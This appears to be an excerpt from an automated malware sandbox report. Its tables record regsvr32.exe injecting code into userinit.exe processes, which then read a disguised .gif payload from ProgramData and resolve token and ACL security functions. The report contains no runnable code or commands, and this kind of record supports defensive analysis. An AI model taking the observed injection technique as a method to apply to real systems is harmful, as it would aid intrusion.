For performance reasons, the remaining 19 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x7ffdc008, size = 4	1	Fn Data
Modify Control Flow	#24: c:\windows\system32\regsvr32.exe	0xf10	os_tid = 0x940, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (191)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6d800000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	6	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6d740000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = Äí, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6d77266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6d772542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6d771d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6d77238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6d7720c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6d771fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6d771e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6d771f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6d771ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6d77216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6d7722be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6d7721e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6d8020ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6d8020b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6d8020c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6d8020d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 659439	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #59: userinit.exe

222

0

»

Information	Value
ID	#59
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:03:49, Reason: Child Process
Unmonitor	End Time: 00:03:53, Reason: Self Terminated
Monitor Duration	00:00:04

OS Process Information

»

Information	Value
PID	0xa54
Parent PID	0xf18 (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x A94 0x A4C 0x A90

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
private_0x00000000000c0000	0x000c0000	0x000c0fff	Private Memory	rw	-
private_0x00000000000d0000	0x000d0000	0x000d0fff	Private Memory	rwx	-
pagefile_0x00000000000e0000	0x000e0000	0x000e6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000000f0000	0x000f0000	0x000f1fff	Pagefile Backed Memory	rw	-
oleaccrc.dll	0x00100000	0x00100fff	Memory Mapped File	r	-
private_0x0000000000110000	0x00110000	0x00110fff	Private Memory	rwx	-
pagefile_0x0000000000120000	0x00120000	0x00121fff	Pagefile Backed Memory	r	-
private_0x0000000000130000	0x00130000	0x0016ffff	Private Memory	rw	-
private_0x0000000000170000	0x00170000	0x001effff	Private Memory	rw	-
windowsshell.manifest	0x00170000	0x00170fff	Memory Mapped File	r	-
private_0x0000000000200000	0x00200000	0x002fffff	Private Memory	rw	-
pagefile_0x0000000000300000	0x00300000	0x003c7fff	Pagefile Backed Memory	r	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
pagefile_0x0000000000470000	0x00470000	0x00570fff	Pagefile Backed Memory	r	-
private_0x0000000000580000	0x00580000	0x005fffff	Private Memory	rw	-
private_0x0000000000610000	0x00610000	0x0061ffff	Private Memory	rw	-
private_0x0000000000620000	0x00620000	0x0071ffff	Private Memory	-	-
userinit.exe	0x00760000	0x00768fff	Memory Mapped File	rwx	-
pagefile_0x0000000000770000	0x00770000	0x0136ffff	Pagefile Backed Memory	r	-
pagefile_0x0000000001370000	0x01370000	0x0144efff	Pagefile Backed Memory	r	-
private_0x00000000014c0000	0x014c0000	0x014cffff	Private Memory	rw	-
private_0x00000000014d0000	0x014d0000	0x0165ffff	Private Memory	rw	-
private_0x00000000014d0000	0x014d0000	0x015dcfff	Private Memory	rw	-
private_0x0000000001620000	0x01620000	0x0165ffff	Private Memory	rw	-
staticcache.dat	0x01660000	0x01f8ffff	Memory Mapped File	r	-
pagefile_0x0000000001f90000	0x01f90000	0x02382fff	Pagefile Backed Memory	r	-
private_0x0000000002390000	0x02390000	0x0248ffff	Private Memory	rw	-
private_0x0000000002490000	0x02490000	0x0268ffff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x02710fff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x02714fff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x02718fff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x0271cfff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x02722fff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x02726fff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x0272afff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x0272efff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x02734fff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x02738fff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x0273cfff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x02742fff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x02746fff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x0274afff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x0274efff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x02754fff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x02758fff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x0275cfff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x02762fff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x02766fff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x0276afff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x0276efff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x02774fff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x02778fff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x0277cfff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x02782fff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x02786fff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x0278afff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x0278efff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x02794fff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x02798fff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x0279cfff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027a2fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027a6fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027aafff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027aefff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027c4fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027c8fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027ccfff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027d0fff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x027e6fff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x027eafff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x027eefff	Private Memory	rw	-
private_0x0000000002750000	0x02750000	0x02804fff	Private Memory	rw	-
private_0x0000000002750000	0x02750000	0x02808fff	Private Memory	rw	-
private_0x0000000002750000	0x02750000	0x0280cfff	Private Memory	rw	-
private_0x0000000002750000	0x02750000	0x02810fff	Private Memory	rw	-
private_0x0000000002760000	0x02760000	0x02826fff	Private Memory	rw	-
private_0x0000000002760000	0x02760000	0x0282afff	Private Memory	rw	-
private_0x0000000002760000	0x02760000	0x0282efff	Private Memory	rw	-
private_0x0000000002770000	0x02770000	0x02844fff	Private Memory	rw	-
private_0x0000000002770000	0x02770000	0x02848fff	Private Memory	rw	-
private_0x0000000002770000	0x02770000	0x0284cfff	Private Memory	rw	-
private_0x0000000002770000	0x02770000	0x02850fff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x02866fff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x0286afff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x0286efff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02884fff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02888fff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x0288cfff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02890fff	Private Memory	rw	-
private_0x00000000027a0000	0x027a0000	0x028a6fff	Private Memory	rw	-
private_0x00000000027a0000	0x027a0000	0x028aafff	Private Memory	rw	-
private_0x00000000027a0000	0x027a0000	0x028affff	Private Memory	-	-
private_0x00000000027b0000	0x027b0000	0x02840fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x02882fff	Private Memory	rw	-
private_0x00000000027f0000	0x027f0000	0x028a0fff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x028e2fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02900fff	Private Memory	rw	-
private_0x0000000002860000	0x02860000	0x02942fff	Private Memory	rw	-
private_0x0000000002870000	0x02870000	0x02960fff	Private Memory	rw	-
private_0x00000000028a0000	0x028a0000	0x029a2fff	Private Memory	rw	-
private_0x00000000028b0000	0x028b0000	0x029c2fff	Private Memory	rwx	-
private_0x00000000029d0000	0x029d0000	0x02acffff	Private Memory	-	-
private_0x0000000002bd0000	0x02bd0000	0x02ccffff	Private Memory	rw	-
private_0x0000000002d70000	0x02d70000	0x02daffff	Private Memory	rw	-
sortdefault.nls	0x02db0000	0x0307efff	Memory Mapped File	r	-
comctl32.dll	0x6d6b0000	0x6d733fff	Memory Mapped File	rwx	-
olepro32.dll	0x6d820000	0x6d838fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffd8000	0x7ffd8000	0x7ffd8fff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 20 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x7ffd8008, size = 4	1	Fn Data
Modify Control Flow	#25: c:\windows\system32\regsvr32.exe	0xf1c	os_tid = 0xa94, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (191)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6d820000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	6	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6d6b0000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = Üð, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
